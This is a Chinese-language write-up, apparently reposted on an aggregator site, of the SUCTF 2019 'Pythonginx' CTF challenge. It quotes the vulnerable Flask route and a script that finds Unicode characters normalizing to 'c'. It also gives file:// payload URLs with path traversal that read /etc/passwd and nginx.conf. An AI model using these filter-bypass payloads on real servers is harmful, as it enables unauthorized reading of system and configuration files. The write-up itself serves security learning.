2. 程式人生 > 其它 >[SUCTF 2019]Pythonginx

[SUCTF 2019]Pythonginx

阿新 發佈:2020-12-13

技術標籤:Webphp安全

前言

文章所涉及的資料來自網際網路整理和個人總結,意在於個人學習和經驗彙總,如有什麼地方侵權,請聯絡本人刪除,謝謝!本文僅用於學習與交流,不得用於非法用途!

題目

在這裡插入圖片描述
題目還給了個原始碼

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
 

    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl =
 
 urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

s
大概就是需要繞過前2個if直到最後的if來進行讀取任意檔案,但這3個if都需要等於suctf.cc
我莫得辦法了,去看了看wp,大佬說這是有關blackhat議題HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization的題目,議題PPT連結如下:

https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf
反正我是看不懂,但看了大佬的操作,差不多就明白一點了,無非就是當URL 中出現一些特殊字元的時候,輸出的結果可能不在預期這句話。
大佬文章連結:https://www.cnblogs.com/Cl0ud/p/12187204.html

做法就是將suctf.cc其中一個字元(這裡做題選定的是該字串最後一個字元c),更改為其它特殊字元,再進行編碼,便可達到逃逸該指令碼構造的語句。
借大佬的指令碼:

from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass
 
def getUrl(url):
    url=url
    host=parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts=list(urlsplit(url))
    host=parts[1]
    if host == 'suctf.cc':
        return False
    newhost=[]
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1]='.'.join(newhost)
    finalUrl=urlunsplit(parts).split(' ')[0]
    host=parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False
 
 
if __name__=='__main__':
    get_unicode()

可能講述的會有些含糊,因為現在做題的我也是半知半懂,但是看了下面的payload可能就明白了
在這裡插入圖片描述
我們只需要用其中任意一個去讀取檔案就可以了
比如:

getUrl?url=file://suctf.c%E2%84%82/…/…/…/…/…/etc/passwd

在這裡插入圖片描述
url中原本最後一個c的位置,更改為類c的特殊字元就能檢視任意檔案
然後wp說需要看nginx的配置檔案才能知道flag在哪裡

getUrl?url=file://suctf.c%E2%84%82/…/…/…/…/…/…/usr/local/nginx/conf/nginx.conf

在這裡插入圖片描述
然後讀取flag
在這裡插入圖片描述

相關推薦

[SUCTF 2019]Pythonginx

技術標籤:Webphp安全 前言 文章所涉及的資料來自網際網路整理和個人總結,意在於個人學習和經驗彙總,如有什麼地方侵權,請聯絡本人刪除,謝謝!本文僅用於學習與交流,不得用於非法用途!

BUUCTF:[SUCTF 2019]Pythonginx

技術標籤:CTF_Web_Writeup 題目提示了,是ngix,所以我們要知道nginx一些檔案存放的地方

buuctf:[SUCTF 2019]Pythonginx

開啟環境後有一個輸入的視窗,檢視原始碼,給了提示 分析原始碼 @app.route(\'/getUrl\', methods=[\'GET\', \'POST\'])

[SUCTF 2019]CheckIn

0x00 開啟web如下,可以看到這是一道上傳的題 新建一個檔案命名為3.php,進行上傳,得到如下結果

[SUCTF 2019]Easy SQL

日常and or 一圈測試之後發現,and or && from都過濾了,很奇怪 || 這個沒有過濾。

Buuctf-web-[SUCTF 2019]CheckIn

首先新增上傳一個.user.ini GIF89a auto_prepend_file=a.jpg 再新增上傳一個a.jpg GIF89a <script language=\'php\'>system(\'cat /flag\')</script>

BUUCTF-[SUCTF 2019]EasySQL 1

好吧這題是我不配 看了網上大佬的WP payload1:*,1大佬的解法,好像直接將原始碼猜出來了 select $_GET[\'query\'] || flag from flagpayload2:select1;setsql_mode=pipes_as_concat;select1||flagfromFlagpayload3:

[SUCTF 2019]EasySQL

[SUCTF 2019]EasySQL 一開啟就是一個注入頁面嘗試了一下常規的注入,都不能很好的注入。 那就嘗試一下使用堆疊注入, 關鍵的查詢程式碼是 select $post[‘query’]||flag from Flag

[SUCTF 2019]CheckIn(user.ini檔案構成的PHP後門)

技術標籤:wp 0x01 知識點 參考文章:user.ini檔案構成的PHP後門 1、 .user.ini是一個能被動態載入的ini檔案,和php.ini不同的是,修改了.user.ini後,不需要重啟伺服器中介軟體,只需要等待user_ini.cache_ttl所

[SUCTF 2019]EasyWeb

[SUCTF 2019]EasyWeb 知識點: 無數字字母shell 利用.htaccess上傳檔案 繞過open_basedir 繞過exif_imagetype()函式

BUU-日刷-[SUCTF 2019]CheckIn 1-.user.ini利用

檔案上傳,首先上傳一張圖片馬試試 提示<?被過濾,可以用下面程式碼繞過

[SUCTF 2019] EasySQL

開啟靶場 輸入數字1(經測驗發現好像任意數字都會有回顯)會有回顯,而字元就不會有回顯

[SUCTF 2019]CheckIn 1

1.發現 1.開啟題目地址發現為檔案上傳,隨便上傳JPG/PHP/TXT檔案。 2.發現PHP檔案上傳不去,並發現exif_imagetype()函式

BUUCTF-[SUCTF 2019]CheckIn

BUUCTF-[SUCTF 2019]CheckIn WriteUp 知識點 .user.ini 檔案 用法: 先上傳一個.user.ini檔案auto_prepend_file=muma.jpg 或者 auto_append_file=muma.jpg兩句話的作用是分別指定一個檔案包含在要進行執行的檔案的

PYPL程式語言排名2019年11月排行榜釋出:Python稱王,拉大與Java差距

PYPL(PopularitY of Programming Language,程式語言流行指數)11 月份的榜單已經發布了。PYPL 是非常流行的參考指標,其榜單資料的排名均是根據榜單物件在 Google 上相關的搜尋頻率進行統計排名,原始資料來自 Goo

2019年11月最新程式語言排行,C非常接近第一名的Java

TIOBE公佈了11月份程式語言排行榜。     本月前20名中有一些有趣的現象,先看看榜單:      首先,C現在非常接近Java,排在Java後指數僅差0.2%,預計年底之前C會再次衝上第一位;C++與Python已

2019年一線大廠JVM面試100問詳細解析!

前言 JVM(Java虛擬機器器)簡單來說就是執行Java程式碼的直譯器,作為螺絲釘程式設計師JVM其實瞭解下就差不多啦,不懂JVM內部細節照樣能寫出優質的程式碼!但是一到造火箭、飛機的場景(面試)不懂JVM的你,會被面試

1篇文章全面總結2019年Java面試知識,掌握這些你也能進大廠!

前言 2019年還有不到2個月的時間就結束了,這一年你收穫了沒?你成長了沒?改變了沒?年初給自己定下的目標實現了沒?

2019年Java面試題基礎系列228道(2),查漏補缺!

2019年Java面試題基礎系列228道 上一篇更新1~20題的答案解析 juejin.im/post/5de8c6… 本次更新Java 面試題(一)的21~50題答案

2019年Java面試題基礎系列228道(1),快看看哪些你還不會?

Java面試題(一) 1、面向物件的特徵有哪些方面? 2、訪問修飾符 public,private,protected,以及不寫(預設)時的區別?